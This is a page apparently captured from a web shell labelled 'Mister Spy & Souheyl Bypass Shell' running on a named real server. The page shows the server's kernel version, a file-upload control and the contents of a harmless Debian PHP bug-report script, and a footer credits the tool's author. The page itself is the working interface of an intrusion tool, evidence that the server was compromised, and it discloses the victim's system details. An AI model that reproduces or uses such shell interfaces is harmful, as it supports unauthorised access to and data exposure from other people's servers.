Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /usr/share/bug/libapache2-mod-php8.1/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //usr/share/bug/libapache2-mod-php8.1/script

#!/bin/sh

MATCH="^[[:space:]]*($|;)"

echo "==== Additional PHP 8.1 information ====" >&3
echo "" >&3
echo "++++ PHP 8.1 SAPI (php8.1query -S): ++++" >&3
/usr/sbin/php8.1query -S >&3
echo "" >&3
echo "++++ PHP 8.1 Extensions (php8.1query -M -v): ++++" >&3
/usr/sbin/php8.1query -M -v >&3
echo "" >&3

echo "++++ Configuration files: ++++" >&3
"**** /etc/php/8.1/apache2/php.ini ****" >&3
grep -Ev "$MATCH" /etc/php/8.1/apache2/php.ini >&3
echo "" >&3
find /etc/php/8.1/apache2/conf.d/ -name '*.ini' | \
while read CONF; do
    echo "**** $CONF ****" >&3
    grep -Ev "$MATCH" "$CONF" >&3
    echo "" >&3
done

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net